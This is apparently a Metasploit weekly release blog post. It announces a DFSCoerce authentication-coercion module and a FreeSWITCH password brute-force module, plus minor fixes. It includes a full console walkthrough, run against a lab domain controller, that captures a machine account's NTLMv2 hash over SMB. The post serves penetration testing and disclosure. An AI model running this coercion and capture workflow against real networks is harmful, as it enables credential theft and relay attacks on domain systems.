Last updated at Fri, 08 Jul 2022 18:35:21 GMT
DFSCoerce - Distributing more than just files
DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new
auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.
The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:
msf6 > use auxiliary/server/capture/smb msf6 auxiliary(server/capture/smb) > run [*] Auxiliary module running as background job 0. msf6 auxiliary(server/capture/smb) > [*] Server is running. Listening on 0.0.0.0:445 [*] Server started. msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96 RHOSTS => 192.168.159.96 msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true VERBOSE => true msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle SMBUser => aliddle msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1 SMBPass => Password1 msf6 auxiliary(scanner/dcerpc/dfscoerce) > run [*] 192.168.159.96:445 - Connecting to Distributed File System (DFS) Namespace Management Protocol [*] 192.168.159.96:445 - Binding to \netdfs... [+] 192.168.159.96:445 - Bound to \netdfs [+] Received SMB connection on Auth Capture Server! [SMB] NTLMv2-SSP Client : 192.168.250.237 [SMB] NTLMv2-SSP Username : MSFLAB\WIN-3MSP8K2LCGC$ [SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000 [+] 192.168.159.96:445 - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful [*] 192.168.159.96:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/dcerpc/dfscoerce) >
FreeSwitch Brute Force Login
A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there's no need to determine or brute force a username — only the password is required!
New module content (2)
- DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de - This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
- FreeSWITCH Event Socket Login by krastanoel - This adds an auxiliary scanner module that brute forces the FreeSwitch's event socket service login interface to guess the password.
Enhancements and features (1)
- #16716 from bcoles - This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.
Bugs fixed (3)
- #16704 from gwillcox-r7 - This fixes an issue when targeting some faulty
memcachedservers that return an error when extracting the keys and values stored in
slabs. The module no longer errors out with a type conversion error.
- #16724 from bcoles - This updates and fixes the
exploit/windows/iis/ms01_026_dbldecodemodule. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
- #16731 from space-r7 - Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).